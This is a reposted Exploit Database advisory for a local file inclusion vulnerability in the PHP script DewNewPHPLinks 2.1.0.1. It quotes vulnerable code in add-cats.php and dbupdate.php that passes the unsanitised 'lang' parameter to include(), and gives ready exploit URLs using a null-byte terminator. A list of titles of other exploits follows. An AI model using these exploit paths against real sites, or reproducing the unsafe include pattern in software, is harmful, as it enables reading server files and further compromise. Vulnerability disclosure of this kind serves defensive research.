DewNewPHPLinks 2.1.0.1 – Local File Inclusion

Exploit Database
15 阅读

作者： ITSecTeam

日期： 2010-03-18
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/11795/

#########################local file include#################
Author: ItSecTeam

download from:http://www.dew-code.com/components/com_jooget/file/dew-newphplinks.v.2.1.0.1b.sef.zip

script:DewNewPHPLinks 2.1.0.1

*********************lfi*******************
vul1:/path/docs/add-cats.php
$lang=$_GET['lang'];
if($lang!='')
include ("../include/lang/$lang.php");
----------
vul2:/path/docs/dbupdate.php
$lang=$_GET['lang'];
if($lang!='')
include ("../include/lang/$lang.php");

--------------------------------------------

xpl lfi:/path/docs/add-cats.php?lang=[lfi]%00
xpl lfi:/path/docs/dbupdate.php?lang=[lfi]%00
########################

discovered by ahmadbady

########################

last Exploits
DewNewPHPLinks 2.1.0.1 – Local File Inclusion的更多信息

Apple WebKit 10.0.2 – ‘FrameLoader::clear’ Universal Cross-Site Scripting：
Muviko 1.0 – ‘q’ SQL Injection：
Zimbra 2009-2013 – Local File Inclusion：
LogonBox Limited / Hypersocket Nervepoint Access Manager – (Unauthenticated) Insecure Direct Object Reference：
Quali CloudShell 7.1.0.6508 (Patch 6) – Persistent Cross-Site Scripting：
UliCMS v9.8.1 – SQL Injection：
OPAC EasyWeb Five 5.7 – ‘nome’ SQL Injection：
Zabbix 3.4.7 – Stored XSS：